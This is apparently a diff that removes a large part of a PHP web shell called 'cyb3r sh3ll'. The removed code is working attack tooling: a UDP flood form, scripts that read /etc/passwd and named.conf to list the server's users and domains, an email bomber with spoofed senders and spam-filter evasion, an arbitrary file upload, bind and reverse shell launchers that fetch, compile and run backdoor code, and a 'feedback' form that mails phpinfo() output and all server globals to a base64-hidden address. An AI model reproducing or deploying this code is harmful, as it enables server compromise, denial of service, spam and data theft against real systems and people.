-<a href="mailto:cyb3r.gladiat0r@gmail.com"></a><br/><br/><font color="green">Greetings:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>r45c4l bro you are my source of inspiration.<br/>r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot and they know for whom i\'m speaking.<br/>Thanks all who report bugs and send to my email id.</font><br/></b></td></tr></table>';

-}

-

-if ($act == "dos") 

-{ 

-?><center><br><br><img src="http://s15.postimage.org/5q2io54zv/dos.png"><br>

-<b>Server IP:</b> <font color="green"><?php echo $_SERVER["SERVER_ADDR"]; ?></font><br><br>

-<b>Your IP:</b> <font color="red"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>

-<form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="ddos">

-IP:

-<input type="text" name="ip" size="15" maxlength="15" class="main" value = "127.0.0.1" onblur = "if ( this.value=='' ) this.value = '127.0.0.1';" onfocus = " if ( this.value == '127.0.0.1' ) this.value = '';">

-&nbsp;&nbsp;&nbsp;&nbsp;Time:

-<input type="text" name="time" size="14" maxlength="20" class="main" value = "10" onblur = "if ( this.value=='' ) this.value = '10';" onfocus = " if ( this.value == '10' ) this.value = '';">

-&nbsp;&nbsp;&nbsp;&nbsp;Port:

-<input type="text" name="port" size="5" maxlength="5" class="main" value = "80" onblur = "if ( this.value=='' ) this.value = '80';" onfocus = " if ( this.value == '80' ) this.value = '';">

-<br><br>

-<input type="submit" value="    Start the Attack--->    ">

-<br><br>

-<center>After initiating the DoS attack, please wait while the browser loads.</center></form></center><?php

-}

-

-if ($act == "ddos") 

-{

-$packets = 0;

-$ip = $_POST['ip'];

-$rand = $_POST['port'];

-set_time_limit(0);

-ignore_user_abort(FALSE);

-

-$exec_time = $_POST['time'];

-

-$time = time();

-echo "<script>alert('Dos Completed!');</script>";

-print "Flooded: $ip on port $rand <br><br>";

-$max_time = $time+$exec_time;

-

-

-

-for($i=0;$i<65535;$i++){

-        $out .= "X";

-}

-while(1){

-$packets++;

-        if(time() > $max_time){

-                break;

-        }

-        

-        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

-        if($fp){

-                fwrite($fp, $out);

-                fclose($fp);

-        }

-}

-echo "Packet complete at ". time() ." with $packets (" . round(($packets*65)/1024, 2) . " kB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";

-}

-

-if ($act == "localdomain")

-{

-echo "<br><center><a href=\"".$surl."act=local\" ><b><u>Sites on this server.</u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=readable\" ><b><u>List of Users.</u></b></a></center><br>";

-}

- 

- if ($act == "local")

- {

-    //radable public_html

-   $file = @implode(@file("/etc/named.conf"));

-   if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }

-   preg_match_all("#named/(.*?).db#",$file ,$r);

-   $domains = array_unique($r[1]);

-

-   function check()

-       {

-            (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):"";

-       }

-

-   check();

-

-   echo "<table align=center border=1 width=59% cellpadding=5>

-         <tr><td colspan=2>[+] Here : [ <b>".count($domains)."</b> ] Domain ...</td></tr>

-         <tr><td><b>List of Domains</b></td><td><b>List of Users</b></td></tr>";

-

-   foreach($domains as $domain)

-       {

-       $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));

-       echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";

-       }

-

-   echo "</table>";

-//radable public_html

- }

- 

- if ($act == "readable")

- {

-       //entries in passwd file

-($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');

-set_time_limit(0);

-###################

-@$passwd = fopen('/etc/passwd','r');

-if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }

-$pub = array();

-$users = array();

-$conf = array();

-$i = 0;

-while(!feof($passwd))

-{

-$str = fgets($passwd);

-if ($i > 35)

-{

-$pos = strpos($str,':');

-$username = substr($str,0,$pos);

-$dirz = '/home/'.$username.'/public_html/';

-if (($username != ''))

-{

-if (is_readable($dirz))

-{

-array_push($users,$username);

-array_push($pub,$dirz);

-}

-}

-}

-$i++;

-}

-###################

-echo '<br><br><textarea class="output" >';

-echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";

-echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";

-echo "[~] Searching for passwords in config files...\n\n";

-foreach ($users as $user)

-{

-$path = "/home/$user/public_html/";

-echo "$path \n";

-}

-echo "\n";

-echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <- that's on the menu -> Explorer \n";

-echo "[+] Done ...\n";

-echo '</textarea><br><br>Coded by <b>cyb3r 9l4d!470r</b> <a href=#/>Homepage</a>';

-

-

- }

-

- 

- if ($act == "mailer")

- {

-    ?>   <TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%"  border=1>

-     <tr> <!-- 1 -->

-           <td valign="top" width="33%" ><p align="center"><b>(: E-Mail Bomber :)</b></p></td>

-           <td valign="top" width="33%" ><p align="center"><b>[: Mass Mailer :]</b></p></td>

-           <td valign="top" ><p align="center"><b>{: Anonymous Mailer :}</b></p></td>

-         </tr>

-     <tr><!-- 2 -->

-             <td valign="top" ><center>

-                 <?php

-    if(

-        isset($_POST['to']) &&

-        isset($_POST['subject']) &&

-        isset($_POST['message']) &&

-        isset($_POST['times']) &&

-        $_POST['to'] != '' &&

-        $_POST['subject'] != '' &&

-        $_POST['message'] != '' &&

-                $_GET['act'] =='mailbomber' &&

-        $_POST['times'] != ''

-    )

-    {

-        $times = $_POST['times'];

-        while($times--)

-        {

-            if(isset($_POST['padding']))

-            {

-                $fromPadd = rand(0,9999);

-                $subjectPadd = " -- ID : ".rand(0,9999999);

-                $messagePadd = "\n\n------------------------------\n".rand(0,99999999);

-                

-            }

-            $from = "your$fromPadd@email.id";

-            if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))

-            {

-                $error = 1;

-                echo "<font color='red'>Some Error Occured!</font>";

-                break;

-            }

-        }

-        if($error != 1)

-        {    echo "<font color='green'>Mail(s) Sent!</font>";       }

-    }

-    else

-    { 

-        ?>

-        <form method="post" action ="<?php echo $surl."act=mailbomber";?>">

-                <table>

-                <tr>

-                    <td >

-                        To 

-                    </td>

-                    <td>

-                        <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com,victim@target.com,victim2@target.com';"/>

-                    </td>

-                </tr>

-                

-                <tr>

-                    <td class="title">

-                        Subject

-                    </td>

-                    <td>

-                        <input type="text" name="subject" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';" />

-                    </td>

-                </tr>

-                 <tr>

-                    <td >

-                        No. of Times  

-                    </td>

-                    <td>

-                        <input name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';"/>

-                    </td>

-                </tr>

-       

-                <tr>

-                    <td>

-                        

-                        Pad your message (Less spam detection)

-                        

-                    </td>

-                    <td>

-                    

-                        <input type="checkbox" name="padding"/>

-                          

-                    </td>

-                </tr>

-                <tr>

-                    <td >

-                        <textarea name="message" cols="25" rows="5" value="cyb3r-sh3ll Rocks!!.." onfocus="if(this.value == 'cyb3r-sh3ll Rocks!! ..')this.value = '';" onblur="if(this.value=='')this.value='cyb3r-sh3ll Rocks!! ..';">cyb3r-sh3ll Rocks!!</textarea>

-                    </td>

-                                        <td >

-                        <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>

-                    </td>

-                </tr>

-                    

-                

-                

-            </table>            

-        </form>   

-        <?php

-    }

-        ?>

-                 

-                 </center></td>

-            

-                 <td valign="top"><center>

-                  <?PHP

-    if(

-        isset($_POST['to']) &&

-        isset($_POST['from']) &&

-        isset($_POST['subject']) &&

-                $_GET['act'] =='massmailer' &&

-        isset($_POST['message'])

-    )

-    {

-

-        if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))

-        {

-            echo "<font color='green'>Mail Sent!</font>";

-        }

-        else

-        {

-            echo "<font color='red'>Some Error Occured!</font>";

-        }

-    }

-    else

-    {

-        ?>

-        <form method="POST" action="<?php echo $surl."act=massmailer";?>">

-            

-            <table >

-                <tr>

-                    <td >

-                        From

-                    </td>

-                    <td>

-                        <input name="from" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/>

-                    </td>

-                </tr>

-                

-                <tr>

-                    <td >

-                        To 

-                    </td>

-                    <td>

-                        <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@target.com,victim2@target.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com';"/>

-                    </td>

-                </tr>

-                

-                <tr>

-                    <td class="title">

-                        Subject

-                    </td>

-                    <td>

-                        <input type="text" name="subject" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';" />

-                    </td>

-                </tr>

-                

-                

-                <tr>

-                    <td >

-                        <textarea name="message" cols="25" rows="5" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>

-                    </td>

-                                        <td >

-                        <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>

-                    </td>

-                </tr>

-                

-                

-                

-            </table>            

-        </form>   

-        <?php

-    }

-

-?>

-                 </center>

-                 </td>

-                

-                <td ><center>

-                  

- <form action="" method="post" enctype="multipart/form-data"> 

-      <table border="0" class="full"> 

-       <tr><td class="taright"><label for="fromname" accesskey="r" class="sbold">F<span class="underline">r</span>om Name:</label></td><td colspan="2"><input type="text" id="fromname" name="fromname" maxlength="100" class="full" /><label for="from" accesskey="f" class="sbold"><span class="underline">F</span>rom E-mail:</label></td><td colspan="2"><input type="text" id="from" name="from" maxlength="100" class="full" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/></td></tr> 

-       

-       <tr><td class="taright"><label for="rcpt" accesskey="o" class="sbold">T<span class="underline">o</span>:</label></td><td colspan="2"><input type="text" id="rcpt" name="rcpt" maxlength="100" class="full" /><label for="subject" accesskey="j" class="sbold">Sub<span class="underline">j</span>ect:</label></td><td colspan="2"><input type="text" id="subject" name="subject" maxlength="100" class="full"  value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';"/></td></tr> 

-   

-       <tr><td class="taright"><label for="reply" accesskey="p" class="sbold opt">Re<span class="underline">p</span>ly-To:</label></td><td colspan="2"><input type="text" id="reply" name="reply" maxlength="100" class="full" /><label for="errors" accesskey="s" class="sbold opt">Error<span class="underline">s</span>-To:</label></td><td colspan="2"><input type="text" id="errors" name="errors" maxlength="100" class="full" /></td></tr> 

-       

-       <tr><td class="taright"><label for="bcc" accesskey="b" class="sbold opt"><span class="underline">B</span>CC:</label></td><td colspan="2"><input type="text" id="bcc" name="bcc" maxlength="100" class="full" /><label for="attachment" accesskey="t" class="sbold opt">A<span class="underline">t</span>tachment:</label></td><td colspan="2"><input type="file" id="attachment" name="attachment" class="full" /></td></tr> 

-       

-       <tr><td class="taright sbold opt">Priority:</td><td colspan="2"><input type="radio" name="importance" id="lowest" value="lowest" /><label for="lowest" accesskey="w">&nbsp;Lo<span class="underline">w</span></label><input type="radio" name="importance" id="normal" value="normal" class="rbtn" checked="checked" /><label for="normal" accesskey="m">&nbsp;Nor<span class="underline">m</span>al</label><input type="radio" name="importance" id="highest" value="highest" class="rbtn" /><label for="highest" accesskey="g">&nbsp;Hi<span class="underline">g</span>h</label></td></tr>

-           

-       <tr><td class="vatop taright"><label for="xmailer" accesskey="l" class="sbold opt"><span id="mailer">X-Mai<span class="underline">l</span>er:</span></label></td><td colspan="2"> 

-         <select name="xmailer" id="xmailer"> 

-          <option value="0" selected="selected">- none -</option> 

-          <option value="1">Apple Mail</option> 

-          <option value="2">ColdFusion MX Application Server</option> 

-          <option value="3">E-Messenger</option> 

-          <option value="4">KMail</option> 

-

-          <option value="5">Lotus Notes</option> 

-          <option value="6">Microsoft Office Outlook</option> 

-          <option value="7">Microsoft Outlook Express</option> 

-          <option value="8">Microsoft Outlook IMO</option> 

-          <option value="9">Microsoft Windows Live Mail</option> 

-          <option value="10">Microsoft Windows Mail</option> 

-          <option value="11">Mozilla Thunderbird</option> 

-          <option value="12">Novell GroupWise</option> 

-          <option value="13">Novell GroupWise Internet Agent</option> 

-          <option value="14">QUALCOMM Windows Eudora Version</option> 

-          <option value="15">The Bat!</option> 

-          <option value="16">YahooMailClassic YahooMailWebService</option> 

-          <option value="99">Custom...</option> 

-         </select> 

-         

-        </td></tr> 

-

-       <tr><td class="taright"><label for="date" accesskey="d" class="sbold opt"><span class="underline">D</span>ate:</label></td><td colspan="2"><input type="text" id="date" name="date" maxlength="50" value="Thu, 10 Nov 2011 18:41:04 +0100" class="datewidth" />&nbsp;<input type="checkbox" id="current" name="current" checked="checked" /><label for="current" accesskey="u">&nbsp;C<span class="underline">u</span>rrent</label></td></tr> 

-       <tr><td class="taright"><label for="charset" accesskey="a" class="sbold opt">Ch<span class="underline">a</span>rset:</label></td><td class="cchs"> 

-         <select name="charset" id="charset" class="full"> 

-          <option value="big5">big5</option> 

-          <option value="euc-kr">euc-kr</option> 

-          <option value="iso-2202-jp">iso-2202-jp</option> 

-          <option value="iso-8859-1">iso-8859-1</option> 

-          <option value="iso-8859-2">iso-8859-2</option> 

-          <option value="iso-8859-3">iso-8859-3</option> 

-          <option value="iso-8859-4">iso-8859-4</option> 

-          <option value="iso-8859-5">iso-8859-5</option> 

-          <option value="iso-8859-6">iso-8859-6</option> 

-          <option value="iso-8859-7">iso-8859-7</option> 

-          <option value="iso-8859-8">iso-8859-8</option> 

-          <option value="koi8-r">koi8-r</option> 

-          <option value="shift-jis">shift-jis</option> 

-          <option value="utf-8" selected="selected">utf-8</option> 

-          <option value="windows-1250">windows-1250</option> 

-          <option value="windows-1251">windows-1251</option> 

-          <option value="windows-1252">windows-1252</option> 

-          <option value="windows-1253">windows-1253</option> 

-          <option value="windows-1254">windows-1254</option> 

-          <option value="windows-1255">windows-1255</option> 

-          <option value="windows-1256">windows-1256</option> 

-          <option value="windows-1257">windows-1257</option> 

-          <option value="windows-1258">windows-1258</option> 

-          <option value="windows-874">windows-874</option> 

-          <option value="x-euc">x-euc</option> 

-          <option value="99">Custom...</option> 

-         </select> 

-        </td><td><input type="text" name="mycharset" maxlength="50" class="full" /></td></tr> 

-       <tr><td class="taright sbold opt">Content-Type:</td><td colspan="2"><input type="radio" name="ctype" id="plain" value="plain" checked="checked" /><label for="plain" accesskey="n">&nbsp;text/plai<span class="underline">n</span></label><input type="radio" name="ctype" id="html" value="html" class="rbtn" /><label for="html" accesskey="h" id="mrk">&nbsp;text/<span class="underline">h</span>tml</label><input type="hidden" name="rte" value="0" /></td></tr> 

-       <tr><td class="vatop taright"><label for="text" accesskey="x" class="sbold">Te<span class="underline">x</span>t:</label></td><td colspan="2"><textarea cols="30" rows="5" id="text" name="text" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';" />I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea></td></tr> 

-         <tr><td></td><td colspan="2"><input type="reset" value="Clear" class="btn" /> <input type="submit" name="ok" value="Send" class="btn sbold slarger" /></td></tr> 

-      </table> 

-     </form> 

-

-                </center></td>

-                

-         </tr>

-     

- </table>       <?php

- }

- 

- if ($act == "nettools")

-{

-echo "<br><center><a href=\"".$surl."act=proxy\" ><b><u>Proxy </u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=whois\" ><b><u>Whois </u></b></a></center><br>";

-}

- 

- if ($act == "feedback")

-

-{

-

- $suppmail = base64_decode("Y3liM3IuZ2xhZGlhdDByQGdtYWlsLmNvbQ==");

-

- if (!empty($submit))

-

- {

-

-  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);

-

-  $body = "cyb3r sh3llv.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;

-

-  if (!empty($fdbk_ref))

-

-  {

-

-   $tmp = @ob_get_contents();

-

-   ob_clean();

-

-   phpinfo();

-

-   $phpinfo = base64_encode(ob_get_contents());

-

-   ob_clean();

-

-   echo $tmp;

-

-   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";

-

-  }

-

-  mail($suppmail,"cyb3r sh3ll v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);

-

-  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";

-

- }

-

- else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Hindi.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}

-

-}

-

-if ($act == "systeminfo") {echo system('systeminfo');}

-

-if ($act == "phpinfo") {@ob_clean(); phpinfo(); cyb3rexit(); }

-

-if ($act == "upload")

-

-{

-  echo "<b>File upload:</b><br><form enctype=\"multipart/form-data\" action=\"\" method=POST>

-

-Select file on your local computer: <input name=\"uploaded\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>

-

-Save this file dir: <input name=\"path\" size=\"70\" value=\"".getcwd()."\"><br><br>

-

-File-name (auto-fill): <input name=uploadfilename size=25><br><br>

-

-<input type=submit name=submit value=\"Upload\">

-

-</form>";

-$target = $_POST['path']; 

- $target = $target .'\\'. basename( $_FILES['uploaded']['name']) ; 

- $ok=1; 

-if (isset($_FILES['uploaded']['name'])) {

-  if (file_exists($target))

-      {

-      echo $_FILES["uploaded"]["name"] . " already exists. ";

-      }

-    else   

-      {

-        if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) 

-          { 

-            echo "Upload: " . $_FILES["uploaded"]["name"] . "<br />";

-            echo "Type: " . $_FILES["uploaded"]["type"] . "<br />";

-            echo "Size: " . round(($_FILES["uploaded"]["size"] / 1024),3) . " Kb<br />";

-            echo "Stored in: " . $target;

-          } 

-        else 

-         { 

-           echo "Sorry, there was a problem uploading your file."; 

-         } 

-      }

- }

-}

-if ($act == "whois")

-{

-global $t,$hcwd;

-if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){

-$server =$_REQUEST['server'];

-$domain=$_REQUEST['domain']."\r\n";

-$ser=fsockopen($server,43,$en,$es,5);

-fputs($ser,$domain);

-echo "<pre>";

-while(!feof($ser))echo fgets($ser);

-echo "</pre>";

-fclose($ser);

-}

-else{

-echo "<center><table width=\"50%\">Whois:<form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo  "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";

-}

-}

-

-

-

-if ($act == "cracker")

-{

- echo "

-<br><center>

-<a href=\"".$surl."act=hash\" >Hash</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=smtp\" >SMTP</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=pop3\" >POP3</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=imap\" >IMAP</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=ftp\" >FTP</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=snmp\" >SNMP</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=mysql\" >MySQL</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=htmlform\" >HTTP Form</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=basicauth\" >HTTP Auth(basic)</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=cpanel\" >CPANEL</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=dic\" >Dictionary Maker</a>

-</center><br>";

-}

-

-if ($act == "shells") 

-{ ?>

-<TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%"  border=1>

-     <tr> <!-- 1 -->

-           <td valign="top" width="50%" ><p align="center"><b>(: Bind/Reverse Shell :)</b></p></td>

-           <td valign="top" ><p align="center"><b>[: Web Shell :]</b></p></td>

-          

-         </tr>

-     <tr><!-- 2 -->

-             <td valign="top" ><center>

-            <?php

-

- $bndportsrcs = array(

-

-  "cyb3r_bindport.pl"=>array("Using PERL","perl %path %port"),

-

-  "cyb3r_bindport.c"=>array("Using C","%path %port %pass")

-

- );

-

- $bcsrcs = array(

-

-  "cyb3r_backconn.pl"=>array("Using PERL","perl %path %host %port"),

-

-  "cyb3r_backconn.c"=>array("Using C","%path %host %port")

-

- );

-

- $dpsrcs = array(

-

-  "cyb3r_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),

-

-  "cyb3r_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")

-

- );

-

- if (!is_array($bind)) {$bind = array();}

-

- if (!is_array($bc)) {$bc = array();}

-

- if (!is_array($datapipe)) {$datapipe = array();}

-

- 

-

- if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}

-

- if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}

-

-  

-

- if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}

-

- if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}

-

- 

-

- if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}

-

- if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}

-

- if (!empty($bindsubmit))

-

- {

-

-  echo "<b>Result of binding port:</b><br>";

-

-  $v = $bndportsrcs[$bind["src"]];

-

-  if (empty($v)) {echo "Unknown file!<br>";}

-

-  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}

-

-  else

-

-  {

-

-   $w = explode(".",$bind["src"]);

-

-   $ext = $w[count($w)-1];

-

-   unset($w[count($w)-1]);

-

-   $srcpath = join(".",$w).".".rand(0,999).".".$ext;

-

-   $binpath = $tmpdir.join(".",$w).rand(0,999);

-

-   if ($ext == "pl") {$binpath = $srcpath;}

-

-   @unlink($srcpath);

-

-   $fp = fopen($srcpath,"ab+");

-

-   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}

-

-   elseif (!$data = cyb3rgetsource($bind["src"])) {echo "Can't download sources!";}

-

-   else

-

-   {

-

-    fwrite($fp,$data,strlen($data));

-

-    fclose($fp);

-

-    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}

-

-    $v[1] = str_replace("%path",$binpath,$v[1]);

-

-    $v[1] = str_replace("%port",$bind["port"],$v[1]);

-

-    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);

-

-    $v[1] = str_replace("//","/",$v[1]);

-

-    $retbind = myshellexec($v[1]." > /dev/null &");

-

-    sleep(5);

-

-    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);

-

-    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}

-

-    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}

-

-   }

-

-   echo "<br>";

-

-  }

-

- }

-

- if (!empty($bcsubmit))

-

- {

-

-  echo "<b>Result of back connection:</b><br>";

-

-  $v = $bcsrcs[$bc["src"]];

-

-  if (empty($v)) {echo "Unknown file!<br>";}

-

-  else

-

-  {

-

-   $w = explode(".",$bc["src"]);

-

-   $ext = $w[count($w)-1];

-

-   unset($w[count($w)-1]);

-

-   $srcpath = join(".",$w).".".rand(0,999).".".$ext;

-

-   $binpath = $tmpdir.join(".",$w).rand(0,999);

-

-   if ($ext == "pl") {$binpath = $srcpath;}

-

-   @unlink($srcpath);

-

-   $fp = fopen($srcpath,"ab+");

-

-   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}

-

-   elseif (!$data = cyb3rgetsource($bc["src"])) {echo "Can't download sources!";}

-

-   else

-

-   {

-

-    fwrite($fp,$data,strlen($data));

-

-    fclose($fp);

-

-    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}

-

-    $v[1] = str_replace("%path",$binpath,$v[1]);

-

-    $v[1] = str_replace("%host",$bc["host"],$v[1]);

-

-    $v[1] = str_replace("%port",$bc["port"],$v[1]);

-

-    $v[1] = str_replace("//","/",$v[1]);

-

-    $retbind = myshellexec($v[1]." > /dev/null &");

-

-    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";

-

-   }

-

-  }

-

- }

-

- if (!empty($dpsubmit))

-

- {

-

-  echo "<b>Result of datapipe-running:</b><br>";

-

-  $v = $dpsrcs[$datapipe["src"]];

-

-  if (empty($v)) {echo "Unknown file!<br>";}

-

-  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}

-

-  else

-

-  {

-

-   $srcpath = $tmpdir.$datapipe["src"];

-

-   $w = explode(".",$datapipe["src"]);

-

-   $ext = $w[count($w)-1];

-

-   unset($w[count($w)-1]);

-

-   $srcpath = join(".",$w).".".rand(0,999).".".$ext;

-

-   $binpath = $tmpdir.join(".",$w).rand(0,999);

-

-   if ($ext == "pl") {$binpath = $srcpath;}

-

-   @unlink($srcpath);

-

-   $fp = fopen($srcpath,"ab+");

-

-   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}

-

-   elseif (!$data = cyb3rgetsource($datapipe["src"])) {echo "Can't download sources!";}

-

-   else

-

-   {

-

-    fwrite($fp,$data,strlen($data));

-

-    fclose($fp);

-

-    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}

-

-    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);

-

-    $v[1] = str_replace("%path",$binpath,$v[1]);

-

-    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);

-

-    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);

-

-    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);

-

-    $v[1] = str_replace("//","/",$v[1]);

-

-    $retbind = myshellexec($v[1]." > /dev/null &");

-

-    sleep(5);

-

-    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);

-

-    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}

-

-    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}

-

-   }

-

-   echo "<br>";

-

-  }

-

- }

-

